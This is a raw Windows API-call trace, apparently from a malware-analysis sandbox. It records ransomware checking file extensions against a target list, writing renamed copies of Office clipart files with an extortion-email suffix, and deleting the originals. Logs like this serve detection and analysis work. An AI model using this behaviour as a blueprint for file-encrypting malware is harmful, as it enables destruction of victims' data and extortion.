[0198.302] lstrlenW (lpString=".ppt") returned 4 [0198.302] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF") returned 68 [0198.302] lstrlenW (lpString=".zip") returned 4 [0198.302] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.302] lstrlenW (lpString=".rar") returned 4 [0198.302] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.302] lstrlenW (lpString=".bz2") returned 4 [0198.302] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.302] lstrlenW (lpString=".7z") returned 3 [0198.302] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF") returned 68 [0198.302] lstrlenW (lpString=".dbf") returned 4 [0198.302] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF") returned 68 [0198.302] lstrlenW (lpString=".1cd") returned 4 [0198.302] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185818.WMF") returned 68 [0198.302] lstrlenW (lpString=".jpg") returned 4 [0198.302] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.303] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.303] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185828.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0198.304] GetLastError () returned 0x0 [0198.304] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1e74, lpOverlapped=0x0) returned 1 [0198.305] WriteFile (in: hFile=0x398, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1e80, lpOverlapped=0x0) returned 1 [0198.306] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.306] WriteFile (in: hFile=0x398, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.307] SetEndOfFile (hFile=0x398) returned 1 [0198.307] CloseHandle (hObject=0x398) returned 1 [0198.307] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.307] SetEndOfFile (hFile=0x360) returned 1 [0198.308] CloseHandle (hObject=0x360) returned 1 [0198.308] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.308] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185828.wmf")) returned 1 [0198.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF") returned 68 [0198.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF") returned 68 [0198.309] lstrlenW (lpString=".doc") returned 4 [0198.309] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.309] lstrlenW (lpString=".docx") returned 5 [0198.309] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0198.309] lstrlenW (lpString=".pdf") returned 4 [0198.309] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.309] lstrlenW (lpString=".xls") returned 4 [0198.309] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.309] lstrlenW (lpString=".xlsx") returned 5 [0198.309] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0198.309] lstrlenW (lpString=".ppt") returned 4 [0198.309] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF") returned 68 [0198.309] lstrlenW (lpString=".zip") returned 4 [0198.309] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.309] lstrlenW (lpString=".rar") returned 4 [0198.309] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.309] lstrlenW (lpString=".bz2") returned 4 [0198.309] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.309] lstrlenW (lpString=".7z") returned 3 [0198.309] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.309] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF") returned 68 [0198.310] lstrlenW (lpString=".dbf") returned 4 [0198.310] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF") returned 68 [0198.310] lstrlenW (lpString=".1cd") returned 4 [0198.310] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.310] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185828.WMF") returned 68 [0198.310] lstrlenW (lpString=".jpg") returned 4 [0198.310] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.310] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.310] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.310] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185834.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398 [0198.311] GetLastError () returned 0x0 [0198.311] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2182, lpOverlapped=0x0) returned 1 [0198.313] WriteFile (in: hFile=0x398, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2190, lpOverlapped=0x0) returned 1 [0198.314] ReadFile (in: hFile=0x360, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.314] WriteFile (in: hFile=0x398, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.314] SetEndOfFile (hFile=0x398) returned 1 [0198.315] CloseHandle (hObject=0x398) returned 1 [0198.315] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.315] SetEndOfFile (hFile=0x360) returned 1 [0198.673] CloseHandle (hObject=0x360) returned 1 [0198.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.717] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0185834.wmf")) returned 1 [0198.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF") returned 68 [0198.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF") returned 68 [0198.718] lstrlenW (lpString=".doc") returned 4 [0198.718] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.718] lstrlenW (lpString=".docx") returned 5 [0198.718] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0198.718] lstrlenW (lpString=".pdf") returned 4 [0198.718] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.718] lstrlenW (lpString=".xls") returned 4 [0198.718] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.718] lstrlenW (lpString=".xlsx") returned 5 [0198.718] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0198.718] lstrlenW (lpString=".ppt") returned 4 [0198.718] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.718] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF") returned 68 [0198.718] lstrlenW (lpString=".zip") returned 4 [0198.718] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.718] lstrlenW (lpString=".rar") returned 4 [0198.718] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.718] lstrlenW (lpString=".bz2") returned 4 [0198.718] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.718] lstrlenW (lpString=".7z") returned 3 [0198.718] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF") returned 68 [0198.719] lstrlenW (lpString=".dbf") returned 4 [0198.719] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF") returned 68 [0198.719] lstrlenW (lpString=".1cd") returned 4 [0198.719] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.719] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0185834.WMF") returned 68 [0198.719] lstrlenW (lpString=".jpg") returned 4 [0198.719] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.719] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.719] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187849.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.720] GetLastError () returned 0x0 [0198.720] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x1d94, lpOverlapped=0x0) returned 1 [0198.722] WriteFile (in: hFile=0x350, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x1da0, lpOverlapped=0x0) returned 1 [0198.723] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.723] WriteFile (in: hFile=0x350, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.723] SetEndOfFile (hFile=0x350) returned 1 [0198.723] CloseHandle (hObject=0x350) returned 1 [0198.723] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.723] SetEndOfFile (hFile=0x37c) returned 1 [0198.724] CloseHandle (hObject=0x37c) returned 1 [0198.725] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.725] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187849.wmf")) returned 1 [0198.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF") returned 68 [0198.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF") returned 68 [0198.726] lstrlenW (lpString=".doc") returned 4 [0198.726] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.726] lstrlenW (lpString=".docx") returned 5 [0198.726] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0198.726] lstrlenW (lpString=".pdf") returned 4 [0198.726] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.726] lstrlenW (lpString=".xls") returned 4 [0198.726] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.726] lstrlenW (lpString=".xlsx") returned 5 [0198.726] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0198.726] lstrlenW (lpString=".ppt") returned 4 [0198.726] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF") returned 68 [0198.726] lstrlenW (lpString=".zip") returned 4 [0198.726] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.726] lstrlenW (lpString=".rar") returned 4 [0198.726] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.726] lstrlenW (lpString=".bz2") returned 4 [0198.726] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.726] lstrlenW (lpString=".7z") returned 3 [0198.726] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF") returned 68 [0198.726] lstrlenW (lpString=".dbf") returned 4 [0198.726] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.726] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF") returned 68 [0198.727] lstrlenW (lpString=".1cd") returned 4 [0198.727] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.727] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187849.WMF") returned 68 [0198.727] lstrlenW (lpString=".jpg") returned 4 [0198.727] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.727] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.727] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.727] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187851.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.728] GetLastError () returned 0x0 [0198.728] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x221c, lpOverlapped=0x0) returned 1 [0198.730] WriteFile (in: hFile=0x350, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2220, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2220, lpOverlapped=0x0) returned 1 [0198.731] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.731] WriteFile (in: hFile=0x350, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.731] SetEndOfFile (hFile=0x350) returned 1 [0198.731] CloseHandle (hObject=0x350) returned 1 [0198.731] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.731] SetEndOfFile (hFile=0x37c) returned 1 [0198.732] CloseHandle (hObject=0x37c) returned 1 [0198.732] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.732] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187851.wmf")) returned 1 [0198.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF") returned 68 [0198.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF") returned 68 [0198.734] lstrlenW (lpString=".doc") returned 4 [0198.734] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.734] lstrlenW (lpString=".docx") returned 5 [0198.734] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0198.734] lstrlenW (lpString=".pdf") returned 4 [0198.734] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.734] lstrlenW (lpString=".xls") returned 4 [0198.734] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.734] lstrlenW (lpString=".xlsx") returned 5 [0198.734] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0198.734] lstrlenW (lpString=".ppt") returned 4 [0198.734] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.734] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF") returned 68 [0198.735] lstrlenW (lpString=".zip") returned 4 [0198.735] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.735] lstrlenW (lpString=".rar") returned 4 [0198.735] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.735] lstrlenW (lpString=".bz2") returned 4 [0198.735] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.735] lstrlenW (lpString=".7z") returned 3 [0198.735] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF") returned 68 [0198.735] lstrlenW (lpString=".dbf") returned 4 [0198.735] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF") returned 68 [0198.735] lstrlenW (lpString=".1cd") returned 4 [0198.735] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187851.WMF") returned 68 [0198.735] lstrlenW (lpString=".jpg") returned 4 [0198.740] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.740] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.740] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187859.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0198.741] GetLastError () returned 0x0 [0198.741] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0xaac, lpOverlapped=0x0) returned 1 [0198.743] WriteFile (in: hFile=0x350, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xab0, lpOverlapped=0x0) returned 1 [0198.744] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0198.744] WriteFile (in: hFile=0x350, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0198.744] SetEndOfFile (hFile=0x350) returned 1 [0198.744] CloseHandle (hObject=0x350) returned 1 [0198.745] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.745] SetEndOfFile (hFile=0x37c) returned 1 [0198.745] CloseHandle (hObject=0x37c) returned 1 [0198.745] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0198.746] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187859.wmf")) returned 1 [0198.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF") returned 68 [0198.746] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF") returned 68 [0198.746] lstrlenW (lpString=".doc") returned 4 [0198.746] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0198.746] lstrlenW (lpString=".docx") returned 5 [0198.746] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0198.746] lstrlenW (lpString=".pdf") returned 4 [0198.746] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0198.746] lstrlenW (lpString=".xls") returned 4 [0198.746] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0198.747] lstrlenW (lpString=".xlsx") returned 5 [0198.747] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0198.747] lstrlenW (lpString=".ppt") returned 4 [0198.747] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0198.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF") returned 68 [0198.747] lstrlenW (lpString=".zip") returned 4 [0198.747] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0198.747] lstrlenW (lpString=".rar") returned 4 [0198.747] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0198.747] lstrlenW (lpString=".bz2") returned 4 [0198.747] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0198.747] lstrlenW (lpString=".7z") returned 3 [0198.747] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0198.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF") returned 68 [0198.747] lstrlenW (lpString=".dbf") returned 4 [0198.747] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0198.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF") returned 68 [0198.747] lstrlenW (lpString=".1cd") returned 4 [0198.747] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0198.747] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187859.WMF") returned 68 [0198.747] lstrlenW (lpString=".jpg") returned 4 [0198.747] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0198.747] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.748] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0198.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187861.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187861.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 